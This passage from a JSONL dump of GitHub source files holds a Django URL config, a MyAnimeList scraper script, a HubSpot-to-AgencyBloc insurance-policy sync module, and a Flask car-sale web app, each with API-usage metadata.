{"api_name": "c_token.Tok", "line_number": 15, "usage_type": "name"}, {"api_name": "c_token.Tok.right_bracket", "line_number": 16, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 16, "usage_type": "name"}, {"api_name": "c_token.Tok.left_bracket_sq", "line_number": 17, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 17, "usage_type": "name"}, {"api_name": "c_token.Tok.right_bracket_sq", "line_number": 18, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 18, "usage_type": "name"}, {"api_name": "c_token.Tok.pound", "line_number": 19, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 19, "usage_type": "name"}, {"api_name": "c_token.Tok.newline", "line_number": 20, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 20, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 27, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 30, "usage_type": "name"}, {"api_name": "c_token.Tok.semicolon", "line_number": 31, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 31, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 40, "usage_type": "name"}, {"api_name": "c_token.Tok.left_paren", "line_number": 43, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 43, "usage_type": "name"}, {"api_name": "c_logging.log_error", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 40, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 56, "usage_type": "name"}, {"api_name": "c_token.Tok.identifier", "line_number": 64, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "5133413839", "text": "from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom portfolio.views import *\n\n# orzubalskydotcom application\nurlpatterns = patterns('portfolio.views',\n url(r'bio$', TemplateView.as_view(template_name=\"bio.html\"), name='bio'),\n url(r'statement$', TemplateView.as_view(template_name=\"statement.html\"), name='statement'), \n url(r'project/(?P[0-9A-Za-z\\-]+)$', ProjectDetail.as_view(), name='project-detail'),\n url(r'experiment/(?P[0-9A-Za-z\\-]+)$', ExperimentDetail.as_view(), name='experiment-detail'),\n url(r'$', 'project_list', name='project-list'),\n)", "repo_name": "orzubalsky/fungi", "sub_path": "website/apps/portfolio/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "4066336402", "text": "from bs4 import BeautifulSoup\nfrom controllers import AnimeScraper, ReviewScraper, UserScraper, WatchlistScraper\nfrom math import ceil\nfrom os import remove\nfrom pandas import read_csv\nfrom requests import get\nfrom os import getenv\n\n# Globals\nBASE_URL = 'https://myanimelist.net'\n\n# Scrape animes\ndef get_animes()->None:\n '''\n Scrape all animes\n\n This function will get a list of genres using Requests.get()\n and BeautifulSoup(), then call the AnimeScraper() object\n to scrape all animes of each genres. Each genre's animes\n will be stored in a CSV file\n '''\n # Function to process retrieved genres in a helpful list format\n get_types = lambda types:sorted([{\n 'name':t.string[:t.string.index('(')-1], \n 'pages':ceil(int(t.string[t.string.index(\"(\")+1:t.string.index(\")\")].replace(',', ''))/100),\n 'link':BASE_URL+t['href']\n } for t in types], key=lambda x:x['pages'])\n # Generate anime soup using Requests.get() and BeautifulSoup() \n page = get(f'{BASE_URL}/anime.php')\n soup = BeautifulSoup(page.text, 'html.parser')\n # Get anime genres using soup\n filters = soup.select('.genre-link')\n genres = get_types([item for f in filters[:2] for item in f.select('.genre-name-link')])\n # Start anime scraper\n AnimeScraper().scrape_info(genres)\n\ndef get_reviews_from_animes()->None:\n '''\n Scrape reviews from animes\n\n This function will call the ReviewScraper() object to scrape \n reviews from the scraped animes. This scraper will only retrieve \n the top 'Recommended', 'Mixed Feelings', and 'Not Recommended' \n reviews while ignoring the reviews with preliminary tag on them if\n the anime has finished airing (since preliminary means that the reviewer \n hasn't finished the anime).\n '''\n animes = read_csv(\"./data/reviews/animes.csv\", sep=\";\", index_col=0)\n ReviewScraper().scrape_from_animes(animes.to_dict('records'))\n\n \n# page = 22\n# running = True\n# while running: \n# for status in ['recommended', 'mixed_feelings', 'not_recommended']: \n# try:\n# animes = read_csv(f\"./data/reviews/{status}/{status}_{page}.csv\", sep='$', index_col=0, names=['title', 'link', 'preliminary'])\n# ReviewScraper().scrape_more_reviews_from_animes(animes.to_dict('records'), status, page)\n# remove(f'./data/reviews/{status}/checkpoint.json')\n# except FileNotFoundError:\n# running = False\n# break\n# page += 1\n\ndef get_users_by_locations()->None:\n '''\n Scrape users by locations\n\n This function will call the UserScraper() object to scrape \n users by locations listed in the array.\n '''\n locations = ['Indonesia', 'Malaysia', 'Singapore', 'Thailand', 'Vietnam', 'Manila', 'Germany', 'France']\n UserScraper('watchlists', 'locations').scrape_from_locations(locations)\n\ndef get_watchlists()->None:\n '''\n Scrape user's animelist\n\n This function will call the WatchlistScraper() object to scrape \n each user's animelist data. The scraped data will be stored in a\n CSV file that is named based on the time of scraping. 
There are \n also some animelist that cannot be scraped (edge cases) due to \n personalized anime watchlists.\n '''\n users = read_csv(\"./data/watchlists/users.csv\", sep=\";\", index_col=0)\n WatchlistScraper().get_watchlists(users.to_dict('records'))\n\nget_watchlists()", "repo_name": "Matthew1906/MyAnimeListScraper", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.ceil", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 30, "usage_type": "call"}, {"api_name": "controllers.AnimeScraper", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "controllers.ReviewScraper", "line_number": 49, "usage_type": "call"}, {"api_name": "controllers.UserScraper", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 85, "usage_type": "call"}, {"api_name": "controllers.WatchlistScraper", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "14289998899", "text": "from helpers import foldl, safemap, hs_get, ab_post, hs_path\nimport agency_bloc as ab\nimport hubspot as hs\nimport hubspot_migrate as hsm\nimport json\nimport time\n\n\ndef agent_checker(pdic, hb_dict, ab_dict):\n hb_agent_id = pdic['properties'].get('agent_originating')\n if not hb_agent_id:\n print(\"No agent specified in Hubspot\")\n email = hb_dict.get(hb_agent_id, {}).get('email')\n return hb_agent_id, ab_dict.get(email)\n\n\nmsp_id = \"2-8483761\"\ndvh_id = \"2-8483915\"\nmap_id = \"2-7775359\"\ncopay_id = \"2-8483892\"\npdp_id = \"2-8567541\"\n\nlabel_dic = {\n '2-7775359': 'MAP',\n '2-8483761': 'MSP',\n '2-8483892': 'COPAY',\n '2-8483915': 'DVH',\n '2-8567541': 'PDP'\n}\noid_dic = {\n 'COPAY': '2-8483892',\n 'DVH': '2-8483915',\n 'MAP': '2-7775359',\n 'MSP': '2-8483761',\n 'PDP': '2-8567541',\n 'MAPD': '2-7775359'\n}\n\ncommission_field = 'commission_id__if_applicable_'\n\ndef get_status(props):\n out = props.get('status')\n if not out:\n out = props.get('plan__status')\n return out\n\n\ndef load_hubspot(object_label, k=.2):\n object_label = object_label.upper()\n object_id = oid_dic.get(object_label)\n assert object_id\n props_raw = hs_get(\"properties/\"+object_id).json()[\"results\"]\n props = sorted([x[\"name\"] for x in props_raw])\n path = hs_path(\"objects/\"+object_id+\"/search\")\n data = {\n 'limit': 100,\n 'sorts': [{'propertyName': 'hs_object_id', 'direction': 'ASCENDING'}],\n 'properties': props\n }\n existing_map, _ = hsm.batch_search(path, data, k = k)\n for x in existing_map:\n x['link'] = 'https://app.hubspot.com/contacts/7879306/record/'+oid_dic[object_label]+'/'+x['id']\n return existing_map\n\ndef load_agency_bloc(object_label):\n path = \"policies/search\"\n object_label = object_label.upper()\n assert object_label in oid_dic\n r = ab_post(path, policyCoverageType=object_label)\n return json.loads(r.text)\n \"\"\"\n try:\n aa = json.loads(r.text)\n batches = [aa[i:i+2000] for i in range(0,len(aa),2000)]\n deets = []\n for i,batch in enumerate(batches):\n ai = [x['policyID'] for x in batch]\n deet1 = ab.policy_details(*ai)\n deets = deets + deet1\n print(\"loaded batch\", i+1, \"of\",len(batches))\n print(\"waiting for\", timeout,\"seconds because of antiquated rate limit\")\n time.sleep(timeout)\n return deets\n except Exception as ee:\n print(\"default\")\n print(ee)\n return r.text\n \"\"\"\n\n\ndef upstrip(maybe_string):\n if type(maybe_string) == str:\n return maybe_string.strip().upper()\n else:\n return maybe_string\n\n\ndef parse_hubspot_fields(h_array, olabel):\n hvp = {}\n hdic = {}\n dups = {}\n for x in h_array:\n props = x['properties']\n k = upstrip(get_commission_field(props, olabel))\n k2 = upstrip(props.get('carrier'))\n if k and k2:\n kk = (k.upper().strip(), k2.upper().strip())\n if kk in hvp:\n hvp.pop(kk)\n x0 = hdic.pop(kk)\n dups[kk] = [x0,x]\n else:\n hvp[kk] = get_status(props)\n hdic[kk] = x\n valid_dup_keys = [k for k in dups.keys() if any(c.isdigit() for c in k[0])]\n dup_errors = {}\n for k in valid_dup_keys:\n ss = []\n v = dups[k]\n for i in range(0, len(v)):\n p_ = v[i]['properties']\n ss.append(get_status(p_))\n if not foldl(lambda a,b: bool(a) and bool(b), True, ss):\n dup_errors[k] = x\n else:\n x = dups.get(k)\n props = x[0]['properties']\n hvp[k] = get_status(props)\n hdic[k] = x[0]\n return hvp, hdic, dup_errors\n\ndef parse_agencybloc_fields(a_array):\n avp = {}\n adic = {}\n dups = {}\n for x in a_array:\n k = x.get('policyNumber')\n k2 = x.get('carrier')\n if k:\n kk = 
(k.upper().strip(), k2.upper().strip())\n if kk in avp:\n avp.pop(kk)\n x1 = adic.pop(kk)\n dups[kk] = [x,x1]\n elif kk in dups:\n dups[kk].append(x)\n else:\n avp[kk] = x.get('policyStatus')\n adic[kk] = x\n to_archive = []\n for k, arr in dups.items():\n added = False\n for x in arr:\n status = x.get('policyStatus')\n if status == '200' and not added:\n adic[k] = x\n avp[k] = '200'\n else:\n to_archive.append(x)\n to_archive = list(filter(lambda x: not bool(x.get('policyStatus') == 'Archive'), to_archive))\n return avp, adic, to_archive\n\n\n\ndef get_contacts(hdic):\n cids = []\n for x in hdic.values():\n if type(x) == list:\n for d in x:\n cid = d.get('properties', {}).get('originally_associated_contact_id')\n if cid:\n cids.append(cid)\n else:\n cid = x.get('properties', {}).get('originally_associated_contact_id')\n if cid:\n cids.append(cid)\n fdata_raw,_ = hs.batch_contacts(cids)\n fdata = {x['id']:x for x in fdata_raw}\n for x in hdic.values():\n if x:\n if type(x) == dict:\n ii = x.get('properties', {}).get('originally_associated_contact_id')\n x['contact'] = fdata.get(ii)\n else:\n for d in x:\n ii = d.get('properties', {}).get('originally_associated_contact_id')\n d['contact'] = fdata.get(ii)\n return fdata\n\n\n\ndef contact_filter(dic, hdic):\n return dict(filter(lambda tup: hdic[tup[0]].get('contact'), dic.items()))\n\n\ndef create_batch_inner(aa, olabel, **kargs):\n oid = oid_dic[olabel.upper()]\n rr = ab.create_policies(aa, olabel.upper(), oid, limit_per_host=10, **kargs)\n success, err = [], []\n for r, s in zip(rr, aa):\n if r[0]:\n success.append((r[1], s))\n else:\n err.append((r[1], s))\n return success, err\n\ndef create_batch(aa, olabel, **kargs):\n s, e = create_batch_inner(aa, olabel, **kargs)\n for i in range(0,10):\n if e:\n s1, e = create_batch_inner(e, olabel, **kargs)\n s = s + s1\n return s, e\n\ndef update_batch_inner(uu):\n rr = ab.update_policies(uu, limit_per_host=10)\n success, err = [],[]\n for r,s in zip(rr, uu):\n if r[0]:\n success.append((r[1], s))\n else:\n err.append(s)\n return success, err\n\ndef update_batch(uu):\n s,e = update_batch_inner(uu)\n for i in range(0,10):\n if e:\n s1,e = update_batch_inner(e)\n s = s + s1\n return s,e\n\ndef parse_duplicates_to_remove(adups):\n out = []\n for k,v in adups.items():\n if len(v) > 1:\n out = out + v[1:]\n return out\n\ndef archive_batch(archiveids):\n aa = []\n for pid in archiveids:\n dic = {\n 'ab_policy_id': pid,\n 'properties': {'status': 'ARCHIVE'}\n }\n aa.append(dic)\n s,e = update_batch_inner(aa)\n for i in range(0,10):\n if e:\n s1, e = update_batch_inner(e)\n s = s + s1\n return s,e\n\ndef dedup_batch(dups_to_remove):\n aa = []\n for a in dups_to_remove:\n pid = a.get('policyID')\n if not pid:\n pid = a.get('PolicyID')\n if pid:\n dic = {\n 'ab_policy_id': pid,\n 'properties': {'status': 'ARCHIVE'}\n }\n aa.append(dic)\n s,e = update_batch_inner(aa)\n for i in range(0,10):\n if e:\n s1,e = update_batch_inner(e)\n s = s + s1\n return s,e\n\ndef show_active_hb_only(hvp, avp):\n out = {}\n ss = set(hvp) - set(avp)\n for k in ss:\n v = hvp[k]\n if v == '200':\n out[k] = v\n return out\n\ndef show_matches(hvp, avp):\n ss = set(avp).union(set(hvp))\n out = {}\n for k in ss:\n i = strip(hvp.get(k))\n j = strip(avp.get(k))\n if i and j and i==j:\n out[k] = i\n return out\n\ndef show_ab_only(hvp, avp):\n ss = set(avp) - set(hvp)\n return {k:v for k,v in avp.items() if k in ss and v.lower() != 'archive'}\n\ndef strip(x):\n if type(x) == str:\n return x.strip()\n else:\n return x\ndef 
show_mismatching_status(hvp, avp):\n ss = set(hvp).intersection(set(avp))\n out = {}\n\n for k in ss:\n i = strip(hvp[k])\n j = strip(avp[k])\n if j.lower() == 'none':\n j = None\n if i != j:\n out[k] = (i,j)\n return out\n\ndef process_matches(hvp, avp):\n create = show_active_hb_only(hvp, avp)\n change_status = show_mismatching_status(hvp, avp)\n archive = show_ab_only(hvp, avp)\n archive = archive\n return create, change_status, archive\n\ndef load_and_process_hubspot(olabel):\n hh = load_hubspot(olabel)\n hvp, hdic, hdups = parse_hubspot_fields(hh, olabel)\n return hvp, hdic, hdups, hh\n\ndef load_and_proces_ab(olabel):\n aa = load_agency_bloc(olabel)\n avp, adic, to_archive = parse_agencybloc_fields(aa)\n return avp, adic, to_archive, aa\n\ndef combine_load_process(olabel):\n hvp, hdic, _, hh = load_and_process_hubspot(olabel)\n get_contacts(hdic)\n avp, adic, to_archive, aa = load_and_proces_ab(olabel)\n for x in avp:\n ax = adic.get(x)\n hx = hdic.get(x)\n if hx:\n hdic[x]['ab_policy_id'] = ax.get('policyID')\n\n create0, update, archive = process_matches(hvp, avp)\n create = contact_filter(create0, hdic)\n return create, create0, update, archive, hdic, adic, to_archive, hh, aa\n\ndef safe_up(s):\n if type(s) == str:\n ss = s.upper().strip()\n if ss == 'NONE':\n return None\n else:\n return ss\n else:\n return s\n\ndef hb_load_policies(olabel, hb_show_active_only):\n hs_check = load_hubspot(olabel)\n hid = {}\n hdic = {}\n for x in hs_check:\n carrier = x['properties']['carrier']\n pnumber = ab.get_commission_field(x['properties'], olabel)\n k = (safe_up(carrier), pnumber)\n hdic[k] = hdic.get(k, []) + [x]\n arr = hid.get(k, [])\n pid = x['id']\n status = x['properties'].get('status')\n if not status:\n status = x['properties'].get('plan__status')\n contact_id = x['properties']['originally_associated_contact_id']\n if status == '200' or not hb_show_active_only:\n arr.append((pid, status, contact_id))\n hid[k] = arr\n return hdic, hid\n\ndef policy_groups(olabel, ab_show_active_only = True, hb_show_active_only = True):\n object_id = oid_dic[olabel.upper()]\n ab_check = load_agency_bloc(olabel)\n abd = {}\n adic = {}\n for x in ab_check:\n carrier, pnumber = (x['carrier'],x['policyNumber'])\n k = (safe_up(carrier), pnumber.strip())\n arr = abd.get(k, [])\n adic[k] = adic.get(k, []) + [x]\n pid, status, contact_id = (x['policyID'], x['policyStatus'], x['entityID'])\n if status.lower() == 'active' or status == '200' or not ab_show_active_only:\n arr.append((pid, status, contact_id))\n abd[k] = arr\n\n hdic, hid = hb_load_policies(olabel, hb_show_active_only)\n\n out = []\n for k in set(abd).union(set(hid)):\n car, pnumber = k\n ab_arr = abd.get(k, [])\n hb_arr = hid.get(k, [])\n group = []\n for rid, status, contact_id in ab_arr:\n d = {\n 'carrier': car,\n 'policy_number': pnumber,\n 'type': 'agency_bloc',\n 'status': status,\n 'id': rid,\n 'link':'https://app.agencybloc.com/policies/'+str(rid)+'/detail',\n 'contact_id': contact_id,\n 'contact_link': 'https://app.agencybloc.com/individuals/'+str(contact_id)+'/detail'\n }\n group.append(d)\n for rid, status, contact_id in hb_arr:\n if contact_id:\n contact_link = 'https://app.hubspot.com/contacts/7879306/contact/'+contact_id\n else:\n contact_link = None\n d = {\n 'carrier': car,\n 'policy_number': pnumber,\n 'type': 'hubspot',\n 'status': status,\n 'id': rid,\n 'link':'https://app.hubspot.com/contacts/7879306/record/'+object_id+'/'+str(rid),\n 'contact_id': contact_id,\n 'contact_link': contact_link\n }\n group.append(d)\n\n 
out.append(group)\n return out, adic, hdic\n\ndef split_error_groups(arr):\n ok, err = [],[]\n for group in arr:\n types = set([x['type'] for x in group])\n if len(types) == 2 and len(group) == 2:\n ok.append(group)\n else:\n err.append(group)\n single_h = []\n single_a = []\n other = []\n for group in err:\n if len(group) == 1:\n if group[0]['type'] == 'agency_bloc':\n single_a = single_a + group\n else:\n assert group[0]['type'] == 'hubspot'\n single_h = single_h + group\n else:\n other.append(group)\n\n no_action, update = [],[]\n for group in ok:\n x,y = group\n if x['status'] == y['status']:\n no_action.append(group)\n else:\n update.append(group)\n\n return no_action, update, single_h, single_a, other\n\ndef agent_routine(arr):\n default_agent_id = '168441184' # house account for deactivated agents\n\n print(\"checking that agents exist\")\n ab_agents = ab.get_agents()\n ab_agents_by_email = {x['email']: x for x in ab_agents}\n default_agent = ab_agents_by_email['house.enlightnu.noemail@medicareschool.com']\n\n hb_agents = hs.get_agents()\n\n agents_to_add = []\n for x in arr:\n hb_agent_id, has_agent = agent_checker(x, hb_agents, ab_agents_by_email)\n if not has_agent:\n agents_to_add.append(hb_agent_id)\n agents_to_add = list(set(agents_to_add))\n agents_use_house = []\n agent_args = []\n print(\"Trying to create missing agents\")\n for i in agents_to_add:\n d = hb_agents.get(i, {})\n firstname = d.get('firstName')\n lastname = d.get('lastName')\n email = d.get('email')\n if firstname and lastname and email:\n agent_args.append((firstname, lastname, email))\n print('created agent', firstname, lastname)\n else:\n # using house account:\n print(\"Using house account for agent id\", i)\n agents_use_house.append(i)\n\n if agent_args:\n ab.create_agents(agent_args)\n\n for x in arr:\n _, has_agent = agent_checker(x, hb_agents, ab_agents_by_email)\n if has_agent:\n x['agent'] = has_agent\n else:\n x['agent'] = default_agent\n\nreport_columns = [\n 'policy_number',\n 'carrier',\n 'hubspot_status',\n 'agencybloc_status_old',\n 'agencybloc_status_new',\n 'action',\n 'hubspot_id',\n 'agencybloc_id',\n 'hubspot_link',\n 'agencybloc_link',\n]\n\ndef format_for_review(create, update, archive, hdic, adic, out1, object_id):\n fcreate = format_response_create(create, out1.get('create_response',({}, None)), object_id)\n fupdate = format_response_update(update, out1.get('update_response',({}, None)), object_id)\n farchive = format_response_archive(archive, out1.get('archive_response',({},None)), hdic, adic, object_id)\n return foldl(lambda a,b: a + list(b.values()), [], [fcreate, fupdate, farchive])\n\ndef format_response_create(arr, resp, object_id):\n dd = {}\n for d1,d2 in resp[0]:\n pid = d1.get('Agencybloc Response', {}).get('policyID')\n d = {\n 'agencybloc_id': pid,\n 'agencybloc_status_new': d1.get('Agencybloc Response', {}).get('Status'),\n 'action': d1.get('Agencybloc Response', {}).get('Action'),\n 'agencybloc_link': 'https://app.agencybloc.com/policies/'+pid+'/detail',\n }\n hubspot_id = d2.get('id')\n dd[hubspot_id] = d\n for dic in arr:\n d = {\n 'policy_number': dic['policy_number'],\n 'carrier': dic['carrier'],\n 'hubspot_status': dic['status'],\n 'agencybloc_status_old': None,\n 'hubspot_id': dic['id'],\n 'hubspot_link': 'https://app.hubspot.com/contacts/7879306/record/'+object_id+'/'+dic['id']\n }\n hid = dic['id']\n d2 = dd.get(hid, {})\n dnew = d | d2\n dd[hid] = dnew\n return dd\n\n\ndef format_response_update(arr, resp, object_id):\n dd = {}\n for d1,d2 in resp[0]:\n pid = 
d1.get('Agencybloc Response', {}).get('policyID')\n d = {\n 'agencybloc_id': pid,\n 'agencybloc_status_new': d1.get('Agencybloc Response', {}).get('Status'),\n 'action': d1.get('Agencybloc Response', {}).get('Action', 'default_update?'),\n 'agencybloc_link': 'https://app.agencybloc.com/policies/'+pid+'/detail',\n }\n hubspot_id = d2.get('id')\n dd[hubspot_id] = d\n for group in arr:\n x,y = group\n if x['type'] == 'hubspot':\n h,a = x,y\n else:\n a,h = x,y\n d = {\n 'policy_number': h['policy_number'],\n 'carrier': h['carrier'],\n 'hubspot_status': h['status'],\n 'agencybloc_status_old': a['status'],\n 'hubspot_id': h['id'],\n 'hubspot_link': 'https://app.hubspot.com/contacts/7879306/record/'+object_id+'/'+h['id']\n }\n hubspot_id = h['id']\n d2 = dd.get(hubspot_id, {})\n dnew = d | d2\n dd[hubspot_id] = dnew\n return dd\n\ndef format_response_archive(arr, resp, hdic, adic, object_id):\n dd = {}\n adic_new = {x[0]['policyID']: x[0] for x in adic.values()}\n for d1,d2 in resp[0]:\n pid = d1.get('Agencybloc Response', {}).get('policyID')\n d = {\n 'agencybloc_id': pid,\n 'agencybloc_status_new': 'Archive',\n 'action': 'archive',\n 'agencybloc_link': 'https://app.agencybloc.com/policies/'+pid+'/detail',\n }\n dd[pid] = d\n for aid in [x['id'] for x in arr]:\n print(aid)\n dic = adic_new.get(aid, {})\n hubspot_status = None\n hubspot_link = None\n d = {\n 'policy_number': dic.get('policyNumber'),\n 'carrier': dic.get('carrier'),\n 'hubspot_status': None,\n 'agencybloc_status_old': dic.get('status'),\n 'hubspot_id': None,\n 'hubspot_link': None,\n }\n d2 = dd.get(aid, {})\n dnew = d | d2\n dd[aid] = dnew\n return dd\n\ndef flatten_records(arr, out_arr):\n for x in arr:\n if type(x) == dict:\n out_arr.append(x)\n else:\n out_arr = flatten_records(x, out_arr)\n return out_arr\n", "repo_name": "pyrex41/payroll-api", "sub_path": "production_funcs.py", "file_name": "production_funcs.py", "file_ext": "py", "file_size_in_byte": 18881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "helpers.hs_get", "line_number": 52, "usage_type": "call"}, {"api_name": "helpers.hs_path", "line_number": 54, "usage_type": "call"}, {"api_name": "hubspot_migrate.batch_search", "line_number": 60, "usage_type": "call"}, {"api_name": "helpers.ab_post", "line_number": 69, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 70, "usage_type": "call"}, {"api_name": "helpers.foldl", "line_number": 123, "usage_type": "call"}, {"api_name": "hubspot.batch_contacts", "line_number": 177, "usage_type": "call"}, {"api_name": "agency_bloc.create_policies", "line_number": 198, "usage_type": "call"}, {"api_name": "agency_bloc.update_policies", "line_number": 216, "usage_type": "call"}, {"api_name": "agency_bloc.get_commission_field", "line_number": 362, "usage_type": "call"}, {"api_name": "agency_bloc.get_agents", "line_number": 466, "usage_type": "call"}, {"api_name": "hubspot.get_agents", "line_number": 470, "usage_type": "call"}, {"api_name": "agency_bloc.create_agents", "line_number": 495, "usage_type": "call"}, {"api_name": "helpers.foldl", "line_number": 521, "usage_type": "call"}]}
+{"seq_id": "31383232767", "text": "from flask import Flask, render_template, request, session, url_for, redirect\nimport sqlReader as sq\napp = Flask(__name__, template_folder=\"/Users/ahmedmoamen/Desktop/ahmed/school/2023 spring/Databases/Car Sale Database/project_milestone3/templates\")\napp.secret_key = 'project2'\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/register')\ndef register():\n return render_template('register.html')\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n email = request.form['email']\n dob = request.form['dob']\n gender = request.form['gender']\n make = request.form.getlist('make[]')\n model = request.form.getlist('model[]')\n year = request.form.getlist('year[]')\n\n cars = []\n for i in range(len(make)):\n car = [make[i], model[i], year[i]]\n cars.append(car)\n print(username, password, email, dob, gender, cars)\n if sq.regesiterUser(dob, email, gender, password, username, cars):\n return render_template('index.html')\n else:\n return render_template('register.html')\n\n@app.route('/Sale_page')\ndef Sale_page():\n return render_template('login.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n email = request.form['email']\n password = request.form['password']\n if sq.checkUser(email, password):\n session['email'] = email\n return render_template('sale.html')\n else:\n return render_template('login.html')\n\n\n@app.route('/add_sale', methods=['GET', 'POST'])\ndef add_sale():\n AdId = request.form['ad_id']\n PriceBought = request.form['price_bought']\n rating = request.form['rating']\n review = request.form['review']\n email = session.get('email')\n\n if sq.UserPurchase(AdId, email, PriceBought, rating, review):\n return render_template('index.html')\n else:\n return render_template('sale.html')\n\n@app.route('/view_reviews')\ndef view_reviews():\n return render_template('viewReview.html')\n\n@app.route('/Search01', methods=['GET', 'POST'])\ndef Search01():\n AdId = request.form.get(\"ad_id\")\n result = sq.viewReview(AdId)\n if result:\n review = result[0]\n return render_template('viewReview.html', review= review, ADID= AdId)\n else:\n return render_template('viewReview.html')\n\n@app.route('/view_rating')\ndef view_rating():\n return render_template('view _aggregated_rating.html')\n\n@app.route('/Search00', methods=['GET', 'POST'])\ndef Search00():\n phone = request.form.get(\"phone_number\")\n print(phone)\n result = sq.viewRating(phone)\n rating = result[0]\n return render_template('view _aggregated_rating.html', rating= str(rating)+\"/5\")\n\n\n@app.route('/show_ads')\ndef show_ads():\n return render_template('show_all_ads.html')\n\n@app.route('/Search0', methods=['GET', 'POST'])\ndef Search0():\n Make = request.form.get('Make')\n Year = request.form.get('Year')\n Location = request.form.get('Location')\n BodyType = request.form.get('BodyType')\n table1 = sq.showAllads(BodyType,Make,Year,Location)\n table2 = sq.showAdsAvgPrice(BodyType,Make,Year,Location)\n return render_template('show_all_ads.html', table1= table1, table2= table2)\n\n@app.route('/show_used_cars')\ndef show_used_cars():\n return render_template('filterFeatures.html')\n@app.route('/Search1', methods=['GET', 'POST'])\ndef Search1():\n features = request.form.getlist('Features[]')\n min_price = request.form.get('min-price')\n max_price = request.form.get('max-price')\n location = 
request.form.get('location')\n results = sq.filterFeatures(features,min_price,max_price, location)\n return render_template('filterFeatures.html', results= results)\n\n@app.route('/top_areas')\ndef top_areas():\n return render_template('top5location.html')\n@app.route('/Search2', methods=['GET', 'POST'])\ndef Search2():\n make = request.form.get('make')\n model = request.form.get('model')\n results = sq.Top5Location(make, model)\n print(results)\n return render_template('top5location.html', results= results)\n\n@app.route('/top_sellers')\ndef top_sellers():\n results = sq.top5sellers()\n return render_template('top5Sellers.html', results= results)\n\n@app.route('/show_properties')\ndef show_properties():\n return render_template(\"sellerInventory.html\")\n\n@app.route('/Search3', methods=['GET', 'POST'])\ndef Search3():\n phone = request.form.get('Phone')\n results = sq.SellerInventory(phone)\n return render_template('sellerInventory.html', results= results)\n\n@app.route('/top_cars')\ndef top_cars():\n return render_template('top5amount.html')\n\n@app.route('/Search4', methods=['GET', 'POST'])\ndef Search4():\n min = request.form.get('LowYear')\n max = request.form.get('HighYear')\n results = sq.top5amount(min, max)\n return render_template('top5amount.html', results= results)\n\n\n", "repo_name": "ahmedmoamen1/Car-Sales-database", "sub_path": "WebApp/webPage.py", "file_name": "webPage.py", "file_ext": "py", "file_size_in_byte": 4995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", 